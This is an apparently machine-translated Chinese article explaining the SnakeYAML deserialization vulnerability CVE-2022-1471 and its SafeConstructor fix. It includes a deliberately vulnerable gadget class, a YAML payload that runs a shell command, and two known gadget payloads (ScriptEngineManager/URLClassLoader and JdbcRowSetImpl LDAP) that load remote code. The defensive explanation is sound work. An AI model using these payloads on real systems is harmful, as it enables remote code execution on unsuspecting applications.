Snakeyaml是著名的YAML 1.1解析器和Java的发射器。最近，据报道了该软件包的CVE-2022-1471漏洞。此漏洞可以导致任意代码执行。 org.yaml:snakeyaml软件包在Java生态系统中广泛使用，部分原因是它默认情况下包装在spring-boot-starter中的Spring Boot。在本文中，我们研究了影响此Java库的安全漏洞，讨论它可能对您的应用程序产生的潜在危险影响，并权衡实际风险。

Snakeyaml安全漏洞是什么？

由于其构造函数类别的缺陷，Java的SnakeyAml库很容易受到任意执行的执行。该类不限制哪种类型可以是deserialized，从而使攻击者可以提供恶意的YAML文件进行审理并可能利用系统。因此，此缺陷导致了一个不安全的避免问题，该问题可能导致任意代码执行。

Snakeyaml脆弱性是什么样的

供应或宣布YAML非常容易。通常您会做这样的事情：

Yaml yaml = new Yaml();
File file = new File("file.yaml");
InputStream inputStream = new FileInputStream(file);
User user = yaml.load(inputStream);

在上面示例中从文件加载YAML时，输入将被解析为通用Object.class，这是Java中All Object的Supertype。在我们的代码中，我们期望一个User对象，但是在将Object加载到内存之后发生。由于具有通用的Object类型，因此可以使用任何对象。如果在应用程序的类Pather中可用，则可能会导致任意代码执行。

这类似于我们在Serialization and deserialization in Java和Abiaoqian的文章中探讨的问题。

Snakeyaml脆弱性演示

为了演示脆弱的场景，我故意创建了小工具类。 A 小工具是实例化时具有副作用的类，要么直接做某事或启动 gadget链。在这种情况下，小工具在调用构造函数时执行给定命令。

public class Gadget {
   private Runnable command;

   public Gadget(String value) {
       this.command = new Command(value);
       this.command.run();
   }
}

当可以使用此Java类时，我可以用前面给出的代码对我的yaml进行验证，我可以在yaml文件中添加以下内容：

!!nl.brianvermeer.snakeyaml.Gadget ["touch myFile.txt"]

这意味着我可以专门针对类Path中可用的SnakeyAml的任何Java类。由于课程已经在我的课堂路径中，而Snakeyaml不管预期的班级都可以创建对象，因此我最终会得到一个ClassCastException。但是，危害已经完成，并执行命令。在您的课堂路径中有一个小工具或小工具链可能会导致灾难性的情况，例如reverse shell attack。

实际应用程序中的Snakeyaml漏洞有多严重？

在上面的示例中，任何人都不太可能以我们所做的方式创建小工具。但是，引入第三方图书馆的确会增加您拥有其他人以这种方式创建的小工具 中的机会。快速查看ysoserial GitHub repo或可能的deserialization issues in the jackson-databind JSON库图书馆的列表，表明风险潜力很高。与Jackson-Databind的不同之处在于，Jackson默认没有启用defaultTyping（如我们在prior vulnerability mention中所述）。

!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://localhost:8080/"]]]]

!!com.sun.rowset.JdbcRowSetImpl
dataSourceName: "ldap://localhost:9999/Evil"
autoCommit: true

Yaml yaml = new Yaml(new SafeConstructor());